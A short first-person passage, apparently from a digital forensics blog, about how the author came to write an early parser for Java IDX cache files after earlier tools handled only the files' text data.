At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit that parsed the IDX for indicators to output into a forensic timeline file at: Java Forensics using TLN Timelines. However, none delved into the binary analysis. Facing a new lifestyle change, and a drastic home move, I found myself with a lot of extra time on my hands for January/February so I decided to sit down and unravel this file. I made my mark by writing my initial IDX file parser, which only carved the known text-based data, and placed it up on Github to judge interest. At the time I wrote my parser, there were no other parsers on the market.